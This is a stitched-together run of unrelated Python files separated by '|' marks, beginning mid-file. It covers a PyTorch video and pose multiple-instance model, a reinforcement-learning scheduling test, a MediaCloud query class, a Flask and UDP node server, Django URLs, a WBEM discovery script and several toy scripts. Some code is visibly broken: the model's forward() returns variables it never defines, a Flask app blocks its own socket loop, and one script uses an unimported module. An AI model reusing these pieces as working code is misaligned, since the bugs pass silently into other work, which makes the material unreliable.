opticalFlow = self.i3d_opticalflow_extractor2(opticalFlow)
opticalFlow = self.i3d_opticalflow_extractor3(opticalFlow)
opticalFlow = opticalFlow.reshape(-1, 64*3*3)
opticalFlow = self.i3d_opticalflow_extractor4(opticalFlow) #output shape (m, 120)
return opticalFlow.squeeze(0) #output shape (120)
# return opticalFlow #output shape (m,120)
#this is a trial attempt at building a feature extractor for the rgb output from i3d
# input dimension will be (7,7,1024) or (m,7,7,1024) maybe?
#I'm assuming, the input will be of the form (7, 7, 1024)
#output will be a 120 dimension vector for now
def feature_extractor_rgb_i3d(self, rgb, ifPool=False):
#reshaping the rgb input, so that it is in channel-first order (m,1024,7,7)
# rgb = rgb.permute(0,3,1,2)
#reshaping the rgb input, so that it is in channel-first order (1024,7,7)
rgb = rgb.permute(2,0,1)
rgb = rgb.unsqueeze(0) #including the batch-size dimension, the shape becomes (1,1024,7,7)
if ifPool==True:
rgb = self.i3d_rgb_extractor1(rgb)
else:
rgb = self.i3d_rgb_extractor2(rgb)
rgb = self.i3d_rgb_extractor3(rgb)
rgb = rgb.reshape(-1, 64*3*3)
rgb = self.i3d_rgb_extractor4(rgb) #output shape (m, 120)
return rgb.squeeze(0) #output shape (120)
# return rgb #output shape (m,120)
#I'm assuming that a tensor of following shape will be passed to this method: (m, human_count,25, 3)
#here m == number of frames in an instance
#m will work as the batch size for the following calculations
def frame_encoder(self, openpose_instance_frames, pooling='attention'):
#openpose_instance_frames will be of shape (human_count, 25, 3)
human_count = openpose_instance_frames.shape[0]
#openpose_instance_frames will be of the size (m, human_count, 25, 3), here m is the batch_size
# m = openpose_instance_frames.shape[0]
# human_count = openpose_instance_frames.shape[1]
H = openpose_instance_frames.reshape(human_count, 25*3)
# H = openpose_instance_frames.reshape(-1, human_count, 25*3)
H = self.frame_dense1(H) #output of this will be shape (human_count, 120)
A = None
if pooling == 'attention' or pooling == 'max':
A_V = self.attention_V_frame(H) #(human_count, 64)
A_U = self.attention_U_frame(H) #(human_count, 64)
A = self.attention_weights_frame(A_V*A_U) # (human_count, 1)
A = torch.transpose(A, 1, 0) #(1, human_count)
# A = A.permute(0, 2, 1) #(m, 1, human_count)
if pooling == 'attention':
A = F.softmax(A, dim=1) # softmax over human_count, (1, human_count)
# A = F.softmax(A, dim=2) #softmax over human_count (m, 1, human_count), softmax doesn't have learnable parameters, hence it need not be declared in __init__
else:
# A_ = torch.zeros((m, 1, human_count))
A_ = torch.zeros(( 1,human_count))
A_[0][A.argmax()] = 1
# for i in range(m):
# A_[i][0][A[i][0].argmax()] = 1
A = A_
elif pooling == 'avg':
# A = torch.ones((m,1,human_count))/human_count
A = torch.ones((1,human_count))/human_count
# M = torch.zeros((m,1,120))
M = torch.mm(A, H) #(1,120)
# for i in range(m):
# M[i] = torch.mm(A[i], H[i]) #Shape of M (m,1,120)
return M.squeeze(0) #output shape (120)
# return M.squeeze(1) #output shape (m,120)
#I'm assuming batch size will be 1 and batch_size will not be included in the input dimension
#I'm assuming that the single_instance will be "list" of tensors of shape (human_count, 25, 3)
def openpose_instance_encoder(self, single_instance, pooling="attention"):
instanceLen = len(single_instance)
encoded_frames = torch.zeros((instanceLen, self.lstm_input_dim)) #(frame_count, 256)
for i in range(instanceLen):
encoded_frame = self.frame_encoder(single_instance[i]) #output shape (120)
encoded_frame = self.instance_dense1(encoded_frame) #output shape (256)
# encoded_frame = encoded_frame.unsqueeze(0) #output shape (1,256)
# encoded_frame = encoded_frame.unsqueeze(1) #output shape (m,1,256)
encoded_frames[i] = encoded_frame
encoded_frames = encoded_frames.unsqueeze(0)
#now encoded_frames will be a tensor of shape (1, frame_count, 256), because lstm expects 3d inputs
#not passing initial activation and initial cell is the same as passing a couple of 0 vectors
activations, last_activation_cell = self.instance_lstm_layer(encoded_frames) #output shape (1, frame_count, 512)
outPutEmbedding = None
if pooling == "attention":
H = activations[0] #shape(frame_count, 512)
A_V = self.attention_V_instance(H) #shape (frame_count, 256)
A_U = self.attention_U_instance(H) #shape (frame_count, 256)
A = self.attention_weights_instance(A_V*A_U) #shape (frame_count, 1)
A = torch.transpose(A, 1, 0) #shape (1, frame_count)
A = F.softmax(A, dim=1) # softmax over frame_count, (1, frame_count)
outPutEmbedding = torch.mm(A,H) #shape (1,512)
outPutEmbedding = outPutEmbedding.squeeze(0) #shape(512)
else:
#since I'm not using the attention pooling, I'll just select last activation as the outputEmbedding
outPutEmbedding = activations[0][-1] #shape (512)
outPutEmbedding = self.instance_dense2(outPutEmbedding) #shape (120)
return outPutEmbedding #shape (120)
#return outPutEmbedding[0][0] #output shape (120)
# return outPutEmbedding[0] #output shape (m,120)
#Each bag is a datapoint. Each bag has multiple instance in it. Each instance has multiple
#frames in it.
#openpose bag is list of list of tensors
def openpose_bag_encoder(self, bag, pooling="attention"):
instanceNum = len(bag)
instanceEncoding = torch.zeros((instanceNum, self.embeddingDimension)) #(instanceNum, 120)
for idx in range(instanceNum):
singleInstance = self.openpose_instance_encoder(bag[idx])
instanceEncoding[idx] = singleInstance
#instanceEncoding has shape (instanceNum, 120)
instanceEncoding = instanceEncoding.unsqueeze(0) #(1, instanceNum, 120)
#not passing initial activation and initial cell is the same as passing a couple of 0 vectors
# activations, last_activation_cell = self.instance_lstm_layer(instanceEncoding) #output shape (1, frame_count, 512)
# outPutEmbedding = None
# if pooling == "attention":
# H = activations[0] #shape(frame_count, 512)
# A_V = self.attention_V_instance(H) #shape (frame_count, 256)
# A_U = self.attention_U_instance(H) #shape (frame_count, 256)
# A = self.attention_weights_instance(A_V*A_U) #shape (frame_count, 1)
# A = torch.transpose(A, 1, 0) #shape (1, frame_count)
# A = F.softmax(A, dim=1) # softmax over frame_count, (1, frame_count)
# outPutEmbedding = torch.mm(A,H) #shape (1,512)
# outPutEmbedding = outPutEmbedding.squeeze(0) #shape(512)
# else:
# #since I'm not using the attention pooling, I'll just select last activation as the outputEmbedding
# outPutEmbedding = activations[0][-1] #shape (512)
# outPutEmbedding = self.instance_dense2(outPutEmbedding) #shape (120)
# return outPutEmbedding #shape (120)
#I'm assuming x will be like the following [i3d_optical, i3d_rgb, openpose_list]
#openpose_list == list of instances
#an instance == list of frames
#a frame == a tensor of shape (human_count, 25, 3)
def forward(self, x, y):
# x = x.squeeze(0)
i3d_optical = x[0]
i3d_rgb = x[1]
openpose_bag = x[2]
optical_encoding = self.feature_extractor_opticalflow_i3d(i3d_optical) #shape (120)
rgb_encoding = self.feature_extractor_rgb_i3d(i3d_rgb) #shape (120)
i3d_encoding = optical_encoding + rgb_encoding #shape (120)
openpose_encoding = self.openpose_bag_encoder(openpose_bag) #shape (120)
# H = self.feature_extractor_part1(x)
# H = H.view(-1, 50 * 4 * 4)
# H = self.feature_extractor_part2(H) # NxL
# A_V = self.attention_V(H) # NxD
# A_U = self.attention_U(H) # NxD
# A = self.attention_weights(A_V * A_U) # element wise multiplication # NxK
# A = torch.transpose(A, 1, 0) # KxN
# A = F.softmax(A, dim=1) # softmax over N
# M = torch.mm(A, H) # KxL
# Y_prob = self.classifier(M)
# Y_hat = torch.ge(Y_prob, 0.5).float()
return Y_prob, Y_hat, A
# AUXILIARY METHODS
def calculate_classification_error(self, X, Y):
Y = Y.float()
_, Y_hat, _ = self.forward(X)
error = 1. - Y_hat.eq(Y).cpu().float().mean().item()
return error, Y_hat
def calculate_objective(self, X, Y):
Y = Y.float()
Y_prob, _, A = self.forward(X)
Y_prob = torch.clamp(Y_prob, min=1e-5, max=1. - 1e-5)
neg_log_likelihood = -1. * (Y * torch.log(Y_prob) + (1. - Y) * torch.log(1. - Y_prob)) # negative log bernoulli
return neg_log_likelihood, A
|
from src.util import resource_path, data_path
from kivy.config import Config
Config.set('kivy', 'log_dir', data_path(''))
import kivy.resources
kivy.resources.resource_add_path(resource_path('src/ui'))
from src.ui.kivy.KivyPlyerGui import RSS2VidApp
RSS2VidApp().run()
|
"""
testing a trained model for scheduling,
and comparing its performance with the
size-aware whittle index heuristic.
To test a control policy, uncomment the code corresponding to an algorithm.
"""
import os
import torch
import random
import operator
import itertools
import numpy as np
import pandas as pd
import scipy.special
import sys
sys.path.insert(0,'../')
from neurwin import fcnn
from qlearning import qLearningAgent
import matplotlib.pyplot as plt
from aql import ProposalQNetwork
from envs.sizeAwareIndexEnv import sizeAwareIndexEnv
from reinforce import reinforceFcnn, REINFORCE
###########################-CONSTANT VALUES-########################################
STATESIZE = 2
numEpisodes = 1
SEED = 30
filesSeed = 50
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
################################-PARAMETERS-########################################
CASE = 1
SCHEDULE = 1
REINFORCELR = 0.001
BATCHSIZE = 5
ARMS = 4
BETA = 0.99
TIMELIMIT = 300
numClass1 = 2
numClass2 = 2
EPISODESEND = 1
EPISODERANGE = 1000
RUNS = 50
noiseVar = 0
NOISY = False
noiseVal = 0.0
assert(numClass1+numClass2 == ARMS)
if CASE == 1:
HOLDINGCOST1 = 1
HOLDINGCOST2 = 1
MAXLOAD1 = 1000000
MAXLOAD2 = 1000000
TESTLOAD1 = np.random.randint(1, MAXLOAD1, size=ARMS)
TESTLOAD2 = np.random.randint(1, MAXLOAD2, size=ARMS)
GOODTRANS1 = 33600
BADTRANS1 = 8400
GOODTRANS2 = 33600
BADTRANS2 = 8400
GOODPROB1 = 0.75
GOODPROB2 = 0.1
if CASE == 2:
HOLDINGCOST1 = 5
HOLDINGCOST2 = 1
MAXLOAD1 = 1000000
MAXLOAD2 = 1000000
TESTLOAD1 = np.random.randint(1, MAXLOAD1, size=ARMS)
TESTLOAD2 = np.random.randint(1, MAXLOAD2, size=ARMS)
GOODTRANS1 = 33600
BADTRANS1 = 8400
GOODTRANS2 = 33600
BADTRANS2 = 8400
GOODPROB1 = 0.5
GOODPROB2 = 0.5
if NOISY:
directory = (f'../testResults/size_aware_env/noisy_results/noise_val_{noiseVal}/case_{CASE}/')
WINNMODEL1DIR = (f'../trainResults/neurwin/size_aware_env/noise_{noiseVal}_version/case_{CASE}/class_1/')
WINNMODEL2DIR = (f'../trainResults/neurwin/size_aware_env/noise_{noiseVal}_version/case_{CASE}/class_2/')
if not os.path.exists(directory):
os.makedirs(directory)
else:
directory = (f'../testResults/size_aware_env/case_{CASE}/')
WINNMODEL1DIR = (f'../trainResults/neurwin/size_aware_env/case_{CASE}/class_1/')
WINNMODEL2DIR = (f'../trainResults/neurwin/size_aware_env/case_{CASE}/class_2/')
if not os.path.exists(directory):
os.makedirs(directory)
readMeFileName = (f'{directory}'+'readme.txt')
readMeFile = open(readMeFileName, 'a')
readMeFile.write(f'\nSelected case: {CASE}\nNumber of arms: {ARMS} \nNumber of class 1 arms: {numClass1+numClass2}')
readMeFile.close()
REINFORCEDIR = (f'../trainResults/reinforce/size_aware_env/case_{CASE}/arms_{ARMS}_schedule_{SCHEDULE}/')
WOLPDIR = (f'../trainResults/wolp_ddpg/size_aware_env/arms_{ARMS}_schedule_{SCHEDULE}/')
AQLDIR = (f'../trainResults/aql/size_aware_env/case_{CASE}/arms_{ARMS}_schedule_{SCHEDULE}/')
##########################-- TESTING FUNCTIONS --#########################################
def calculateSecondaryIndex():
global goodEnvs, goodIndex
for i in goodEnvs:
nuem = envs[i].holdingCost * envs[i].goodTransVal
denom = envs[i].arm[0][0]
goodIndex[i] = nuem / denom
def getSelectionSizeAware(goodIndex, badIndex):
result = []
copyGoodIndex = goodIndex.copy()
copyBadIndex = badIndex.copy()
if len(copyGoodIndex) + len(copyBadIndex) == SCHEDULE:
armsToActivate = SCHEDULE - len(copyGoodIndex)
else:
armsToActivate = len(copyBadIndex)
armsToActivate = min(SCHEDULE, len(copyGoodIndex) + len(copyBadIndex))
for i in range(armsToActivate):
if len(copyGoodIndex) != 0:
result.append(max(copyGoodIndex.items(), key=operator.itemgetter(1))[0])
del copyGoodIndex[result[-1]]
else:
result.append(max(copyBadIndex.items(), key=operator.itemgetter(1))[0])
del copyBadIndex[result[-1]]
return result
def getSelection(index):
result = []
copyIndex = index.copy()
if len(copyIndex) < SCHEDULE:
for i in range(len(copyIndex)):
result.append(max(copyIndex.items(), key=operator.itemgetter(1))[0])
del copyIndex[result[i]]
else:
for i in range(SCHEDULE):
result.append(max(copyIndex.items(), key=operator.itemgetter(1))[0])
del copyIndex[result[i]]
choice = result
return choice
def calculatePrimaryIndex():
global badEnvs, badIndex
for i in badEnvs:
nuem = envs[i].holdingCost
denom = envs[i].goodProb*((envs[i].goodTransVal/envs[i].badTransVal) - 1)
badIndex[i] = nuem / denom
def initialize():
global numClass1, numClass2, TESTLOAD1, TESTLOAD2, envSeeds, envs
num1 = numClass1
num2 = numClass2
load1Index = 0
load2Index = 0
for i in range(ARMS):
if num1 != 0:
env = sizeAwareIndexEnv(numEpisodes=numEpisodes, HOLDINGCOST=HOLDINGCOST1, seed=envSeeds[i], Training=False,
r1=BADTRANS1, r2=GOODTRANS1, q=GOODPROB1, case=CASE, classVal=1, load=TESTLOAD1[load1Index], noiseVar = noiseVar,
maxLoad = MAXLOAD1, batchSize=EPISODESEND, episodeLimit=1000000, fixedSizeMDP=False)
load1Index += 1
num1 -= 1
elif num2 != 0:
env = sizeAwareIndexEnv(numEpisodes=numEpisodes, HOLDINGCOST=HOLDINGCOST2, seed=envSeeds[i], Training=False,
r1=BADTRANS2, r2=GOODTRANS2, q=GOODPROB2, case=CASE, classVal=2, load=TESTLOAD2[load2Index], noiseVar = noiseVar,
maxLoad = MAXLOAD2, batchSize=EPISODESEND, episodeLimit=1000000, fixedSizeMDP=False)
load2Index += 1
num2 -= 1
envs[i] = env
def initializeAgents():
global MODELNAME1, MODELNAME2, agents
num1 = numClass1
num2 = numClass2
for i in range(ARMS):
if num1 != 0:
agent = fcnn(stateSize=STATESIZE)
agent.load_state_dict(torch.load(MODELNAME1))
agent.eval()
agents[i] = agent
num1 -= 1
elif num2 != 0:
agent = fcnn(stateSize=STATESIZE)
agent.load_state_dict(torch.load(MODELNAME2))
agent.eval()
agents[i] = agent
num2 -= 1
def resetEnvs():
global states, envs
for key in envs:
state = envs[key].reset()
states[key] = state
def calculateIndexNeuralNetwork():
global indexNN, states
for key in agents:
indexNN[key] = agents[key].forward(states[key]).detach().numpy()[0]
choice = getSelection(indexNN)
indexNN = {}
return choice
def selectArmSizeAwareIndex():
global goodEnvs, badEnvs, goodIndex, badIndex, time, states
for key in envs:
if envs[key].channelState[time] == 1:
goodEnvs.append(key)
else:
badEnvs.append(key)
calculateSecondaryIndex()
calculatePrimaryIndex()
arms = getSelectionSizeAware(goodIndex, badIndex)
goodEnvs = []
badEnvs = []
goodIndex = {}
badIndex = {}
return arms
def takeActionAndRecordNN(arms):
global rewards, time, states, envs
cumReward = 0
for arm in arms:
nextState, reward, done, info = envs[arm].step(1)
cumReward += reward
states[arm] = nextState
if done:
del envs[arm]
del agents[arm]
for key in envs:
if key in arms:
pass
else:
nextState, reward, done, info = envs[key].step(0)
states[key] = nextState
cumReward += reward
rewards.append((BETA**time)*cumReward)
def takeActionAndRecordRewardSizeAwareIndex(arms):
global rewards, time, envs, states
cumReward = 0
for arm in arms:
nextState, reward, done, info = envs[arm].step(1)
cumReward += reward
states[arm] = nextState
if done:
del envs[arm]
for key in envs:
if key in arms:
pass
else:
nextState, reward, done, info = envs[key].step(0)
states[key] = nextState
cumReward += reward
rewards.append((BETA**time)*cumReward)
def getActionTableLength():
scheduleArms = SCHEDULE
actionTable = np.zeros(int(scipy.special.binom(ARMS, scheduleArms)))
n = int(ARMS)
actionTable = list(itertools.product([0, 1], repeat=n))
actionTable = [x for x in actionTable if not sum(x) != scheduleArms]
return actionTable
def REINFORCETakeActionAndRecordReward():
global rewards, state, reinforceAgent, envs, actionTable
cumReward = 0
stateVals = []
action_probs = reinforceAgent.forward(state).detach().numpy()
G = np.random.RandomState()
action = G.choice(np.arange(len(actionTable)), p=action_probs)
actionVector = actionTable[action]
for i in range(len(actionVector)):
if actionVector[i] == 1:
nextState, reward, done, info = envs[i].step(1)
stateVals.append(nextState[0])
stateVals.append(nextState[1])
if nextState[0] != 0.:
cumReward += reward
else:
nextState, reward, done, info = envs[i].step(0)
stateVals.append(nextState[0])
stateVals.append(nextState[1])
if nextState[0] != 0.:
cumReward += reward
state = stateVals
state = np.array(state, dtype=np.float32)
rewards.append((BETA**time)*cumReward)
def resetREINFORCEEnvs():
global envs, state
for key in envs:
vals = envs[key].reset()
val1 = vals[0]
val2 = vals[1]
state.append(val1)
state.append(val2)
state = np.array(state, dtype=np.float32)
##########################TESTING-STEP######################################
####################### SIZE-AWARE INDEX ##################################
'''
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
cumReward = []
for i in range(RUNS):
envSeeds = np.random.randint(0, 10000, size=ARMS)
time = 0
envs = {}
rewards = []
goodEnvs = []
badEnvs = []
#index = {}
goodIndex = {}
badIndex = {}
agents = {}
states = {}
indexNN = {}
LOADS = []
initialize()
resetEnvs()
while (time < TIMELIMIT):
arms = selectArmSizeAwareIndex()
takeActionAndRecordRewardSizeAwareIndex(arms)
###############################################
time += 1
if len(envs) == 0:
break
total_reward = (np.cumsum(rewards))[-1]
cumReward.append(total_reward)
print(f'Finished size aware index value for run {i+1} scheduling {SCHEDULE} arms')
data = {'run': range(RUNS), 'cumulative_reward':cumReward}
df = pd.DataFrame(data=data)
sizeAwareFileName = (f'{directory}'+f'sizeAwareIndexResults_arms_{ARMS}_schedule_{SCHEDULE}_arms.csv')
df.to_csv(sizeAwareFileName, index=False)
'''
################################### NEURWIN TESTING ##########################################
'''
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
for i in range(RUNS):
envSeeds = np.random.randint(0, 10000, size=ARMS)
ALLEPISODES = np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE)
zeroEnvs = {}
total_reward = []
for x in ALLEPISODES:
EPISODESTRAINED = x
MODELNAME1 = WINNMODEL1DIR+(f'seed_{filesSeed}_lr_0.001_batchSize_{BATCHSIZE}_trainedNumEpisodes_{EPISODESTRAINED}/trained_model.pt')
MODELNAME2 = WINNMODEL2DIR+(f'seed_{filesSeed}_lr_0.001_batchSize_{BATCHSIZE}_trainedNumEpisodes_{EPISODESTRAINED}/trained_model.pt')
nnFileName = directory+(f'nnIndexResults_arms_{ARMS}_batchSize_{BATCHSIZE}_run_{i}_schedule_{SCHEDULE}_arms.csv')
############################## NN INDEX TEST ####################################
time = 0
envs = {}
rewards = []
goodEnvs = []
badEnvs = []
index = {}
agents = {}
states = {}
indexNN = {}
initialize()
initializeAgents()
resetEnvs()
while (time < TIMELIMIT):
arms = calculateIndexNeuralNetwork()
takeActionAndRecordNN(arms)
###############################################
time += 1
if len(envs) == 0:
break
total_reward.append((np.cumsum(rewards))[-1])
print(f'finished NN scheduling for episode {x}')
data = {'episode': np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE), 'cumulative_reward':total_reward}
df = pd.DataFrame(data=data)
df.to_csv(nnFileName, index=False)
print(f'finished NN scheduling for run {i+1}')
'''
############################### REINFORCE TESTING ########################################
'''
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
actionTable = getActionTableLength()
hidden1 = 92
hidden2 = 42
for i in range(RUNS):
envSeeds = np.random.randint(0, 10000, size=ARMS)
ALLEPISODES = np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE)
zeroEnvs = {}
total_reward = []
remainingLoad = 0
for x in ALLEPISODES:
EPISODESTRAINED = x
REINFORCEMODELDIR = REINFORCEDIR+(f'seed_{filesSeed}_lr_{REINFORCELR}_batchSize_{BATCHSIZE}_trainedNumEpisodes_{EPISODESTRAINED}/trained_model.pt')
reinforceFileName = directory+(f'reinforceResults_arms_{ARMS}_batchSize_{BATCHSIZE}_lr_{REINFORCELR}_run_{i}_schedule_{SCHEDULE}.csv')
time = 0
envs = {}
rewards = []
state = []
initialize()
resetREINFORCEEnvs()
reinforceAgent = reinforceFcnn(stateDim=ARMS*2, actionDim=ARMS, hidden1=hidden1, hidden2=hidden2)
reinforceAgent.load_state_dict(torch.load(REINFORCEMODELDIR))
reinforceAgent.eval()
while (time < TIMELIMIT):
REINFORCETakeActionAndRecordReward()
time += 1
for b in envs:
remainingLoad += envs[b].arm[0][0]
if remainingLoad == 0:
break
remainingLoad = 0
total_reward.append((np.cumsum(rewards))[-1])
print(f'finished REINFORCE scheduling for episode {x}. rewards: {total_reward[-1]}')
data = {'episode': np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE), 'cumulative_reward':total_reward}
df = pd.DataFrame(data=data)
df.to_csv(reinforceFileName, index=False)
print(f'finished REINFOCE scheduling for run {i+1}')
'''
########################## AQL TESTING ###############################
def AQLTakeActionAndRecordReward():
global rewards, state, aqlAgent, envs, actionTable
cumReward = 0
stateVals = []
action, qVals = aqlAgent.forward(state)
if len(envs) == 100:
indices = (-qVals).argsort()[:SCHEDULE]
notIndices = (-qVals).argsort()[SCHEDULE:]
qVals[indices] = 1
qVals[notIndices] = 0
actionVector = qVals.detach().numpy()
else:
actionVector = actionTable[action]
for i in range(len(actionVector)):
if actionVector[i] == 1:
nextState, reward, done, info = envs[i].step(1)
stateVals.append(nextState[0])
stateVals.append(nextState[1])
if nextState[0] != 0.:
cumReward += reward
else:
nextState, reward, done, info = envs[i].step(0)
stateVals.append(nextState[0])
stateVals.append(nextState[1])
if nextState[0] != 0.:
cumReward += reward
state = stateVals
state = np.array(state, dtype=np.float32)
rewards.append((BETA**time)*cumReward)
'''
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
#actionTable = getActionTableLength()
DIM1 = 512
DIM2 = 196
for i in range(RUNS):
envSeeds = np.random.randint(0, 10000, size=ARMS)
ALLEPISODES = np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE)
total_reward = []
for x in ALLEPISODES:
EPISODESTRAINED = x
AQLMODELDIR = AQLDIR+(f'seed_{filesSeed}_lr_0.001_trainedNumEpisodes_{EPISODESTRAINED}/trained_model.pt')
aqlFileName = directory+(f'aqlResults_arms_{ARMS}_run_{i}_schedule_{SCHEDULE}.csv')
time = 0
envs = {}
rewards = []
state = []
initialize()
resetREINFORCEEnvs()
aqlAgent = ProposalQNetwork(ARMS*2, ARMS, DIM1, DIM2)
aqlAgent.load_state_dict(torch.load(AQLMODELDIR))
aqlAgent.eval()
while True:
AQLTakeActionAndRecordReward()
time += 1
if time == TIMELIMIT:
break
total_reward.append((np.cumsum(rewards))[-1])
print(f'finished AQL for trained episodes: {x}. rewards : {total_reward[-1]}')
data = {'episode': np.arange(0, EPISODESEND+EPISODERANGE, EPISODERANGE), 'cumulative_reward':total_reward}
df = pd.DataFrame(data=data)
df.to_csv(aqlFileName, index=False)
print(f'finished AQL scheduling for run {i+1}')
'''
|
import os
from common.utils import run, expect_retcode
def run_test(sut, verbose, debug):
this_dir = os.path.dirname(os.path.abspath(__file__))
args = '-h'.split()
proc, out = run(sut, args, this_dir, 3, verbose, debug)
expect_retcode(proc, 0, out, verbose, debug)
|
import mediacloud, datetime, logging
logging.basicConfig(filename='electionCount.log', format='%(levelname)s:%(message)s', level=logging.DEBUG)
class ElectionCount:
def __init__(self, key):
#Intitalise function with actual key value
self.key = key
logging.info('Accessing MediaCloud')
self.mc = mediacloud.api.MediaCloud(self.key)
logging.info('Finished Accessing MediaCloud')
def getSentenceCount(self, person1, person2, start_date, end_date):
logging.debug('Inputs to getSentenceCount: ' + person1 + ',' + person2 + ',' + str(start_date) + ',' + str(end_date))
mc = self.mc
res = mc.sentenceCount(person1, solr_filter=[self.mc.publish_date_query( datetime.date(start_date[2], start_date[1], start_date[0]), datetime.date(end_date[2], end_date[1], end_date[0]) ), 'tags_id_media:1' ])
res2 = mc.sentenceCount(person2, solr_filter=[mc.publish_date_query( datetime.date(start_date[2], start_date[1], start_date[0]), datetime.date(end_date[2], end_date[1], end_date[0]) ), 'tags_id_media:1' ])
return res['count'], res2['count']
|
class WalkNavigation:
jump_height = None
mouse_speed = None
teleport_time = None
use_gravity = None
use_mouse_reverse = None
view_height = None
walk_speed = None
walk_speed_factor = None
|
from time import time
import fibonacci as pf
import cFibonacci as cf
n = 1000000
t1 = time()
pf.ifib(n)
t2 = time()
cf.ifib(n)
t3 = time()
print
print "n=" + str(n)
print "Iterative fibonacci time in Python: " + str(t2-t1)
print "Iterative fibonacci time in C: " + str(t3-t2)
print "C/Python ratio: " + str((t2-t1)/(t3-t2))
print
t1 = time()
pf.fdfib(n)
t2 = time()
print "Fast doubling fibonacci time in Python: " + str(t2-t1)
print
n = 40
t1 = time()
pf.rfib(n)
t2 = time()
cf.rfib(n)
t3 = time()
print "n=" + str(n)
print "Recursive fibonacci time in Python: " + str(t2-t1)
print "Recursive fibonacci time in C: " + str(t3-t2)
print "C/Python ratio: " + str((t2-t1)/(t3-t2))
|
from setuptools import setup, find_packages
setup(name="Qelos Core",
description="qelos-core",
author="Sum-Ting Wong",
author_email="sumting@wo.ng",
install_requires=[],
packages=["qelos_core"],
)
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 7 20:14:28 2021
@author: punti
"""
print("Hello World")
|
n = int(input())
for i in range(1, n + 1):
print(i)
|
# ex028 é a v1.0 do jogo. Fazer várias tentativas até acertar o número que o computador 'pensou'
# número int entre 0 e 10
from random import randint
pc = randint(0, 10)
print('''Sou seu computador,...
Acabei de pensar em um número entre 0 e 10.
Será que você consegue acertar com menos de 4 tentativas?''')
acertou = False
palpite = 0
while not acertou:
jogador = int(input('Seu palpite: '))
palpite += 1
if jogador == pc:
acertou = True
else:
if jogador < pc:
print('Mais... Tente novamente')
else:
print('Menos... Tente novamente')
print(f'Acertou com {palpite} tentativas!', end=' ')
if palpite <= 3:
print('Parabéns!')
else:
print('Better luck next time!')
|
from flask import Flask, abort
import json
import socket, sys
app = Flask(__name__)
PORT = 7555
MAX = 65535
temp= []
@app.route('/node', methods=['GET'])
def semua():
return json.dumps(temp)
@app.route('/node/<int:node_id>', methods=['GET'])
def satu(node_id):
node = None
for n in temp :
if n["id"] == node_id :
node = n
if node :
return json.dumps(node)
else :
abort(404)
if __name__=='__main__':
app.run(debug=True, port=7555)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('', PORT))
while True:
datax, address = s.recvfrom(MAX)
temp.append(datax)
print 'The client says', datax
|
from django.conf import settings
from django.urls import include, re_path
from django.conf.urls.static import static
from django.contrib import admin
from testproject import views
urlpatterns = [
re_path(r'^admin/', admin.site.urls),
re_path(r'^$', views.TestView.as_view(), name='home'),
re_path(r'^groups-manager/', include('groups_manager.urls', namespace='groups_manager')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
#!/usr/bin/env python
"""
Neighboring WBEM agents.
"""
import sys
import logging
import lib_util
import lib_wbem
import lib_common
import lib_credentials
from lib_properties import pc
from sources_types import neighborhood as survol_neighborhood
# Similar to portal_wbem.py except that:
# - This script uses SLP.
# - This script can only give top-level URLs.
def _add_from_wbem_cimom(grph, cimom_wbem):
parsed_url = lib_util.survol_urlparse(cimom_wbem)
host_wbem = parsed_url.hostname
logging.debug("host_wbem=%s", host_wbem)
if not host_wbem:
return None
# http://mymachine:8000/survol/namespaces_wbem.py?xid=http:%2F%2F192.168.0.17:5988/.
cimom_wbem_cgi = cimom_wbem.replace("//", "%2f%2f")
logging.debug("cimomWbem=%s cimom_wbem_cgi=%s", cimom_wbem, cimom_wbem_cgi)
url_wbem = lib_wbem.WbemAllNamespacesUrl(cimom_wbem_cgi)
wbem_node = lib_common.NodeUrl(url_wbem)
wbem_host_node = lib_uris.gUriGen.HostnameUri(host_wbem)
grph.add((wbem_node, pc.property_information, lib_util.NodeLiteral(cimom_wbem)))
grph.add((wbem_node, pc.property_host, wbem_host_node))
return wbem_node
def _wbem_servers_display(grph):
cred_names = lib_credentials.get_credentials_names("WBEM")
logging.debug("WbemServersDisplay")
for cimom_wbem in cred_names:
logging.debug("WbemServersDisplay cimomWbem=%s", cimom_wbem)
# The credentials are not needed until a Survol agent uses HTTPS.
wbem_node = _add_from_wbem_cimom(grph, cimom_wbem)
if not wbem_node:
continue
grph.add((wbem_node, pc.property_information, lib_util.NodeLiteral("Static definition")))
def Main():
# If this flag is set, the script uses SLP to discover WBEM Agents.
paramkey_slp = "Service Location Protocol"
cgiEnv = lib_common.ScriptEnvironment(
parameters={paramkey_slp: False}
)
flag_slp = bool(cgiEnv.get_parameters(paramkey_slp))
grph = cgiEnv.GetGraph()
_wbem_servers_display(grph)
if flag_slp:
dict_services = survol_neighborhood.GetSLPServices("survol")
for key_service in dict_services:
wbem_node = _add_from_wbem_cimom(grph, key_service)
if not wbem_node:
continue
grph.add((wbem_node, pc.property_information, lib_util.NodeLiteral("Service Location Protocol")))
attrs_service = dict_services[key_service]
for key_attr in attrs_service:
prop_attr = lib_common.MakeProp(key_attr)
val_attr = attrs_service[key_attr]
grph.add((wbem_node, prop_attr, lib_util.NodeLiteral(val_attr)))
cgiEnv.OutCgiRdf()
if __name__ == '__main__':
Main()
|
import os
import shutil
import tensorflow as tf
from tensorflow import keras
from logs import logDecorator as lD
import jsonref
import numpy as np
import pickle
from tqdm import tqdm
import PIL
import matplotlib.pyplot as plt
config = jsonref.load(open('../config/config.json'))
logBase = config['logging']['logBase'] + '.modules.data.getData'
dataFolder = '../data/raw_data/'
@lD.log(logBase + '.getInputDataDict')
def getInputDataDict(logger, resize_shape=(56, 56, 3)):
try:
shape2D = resize_shape[:2]
channelSize = resize_shape[-1]
dataDict = mnistFashion()
inputDataDict = {}
for dataName in ['train_images', 'test_images']:
tmpArr = []
imageStack = dataDict[ dataName ]
for img in tqdm(imageStack):
img = img / 255.0
img_resized = PIL.Image.fromarray(img).resize(size=shape2D)
img_resized = np.array(img_resized)
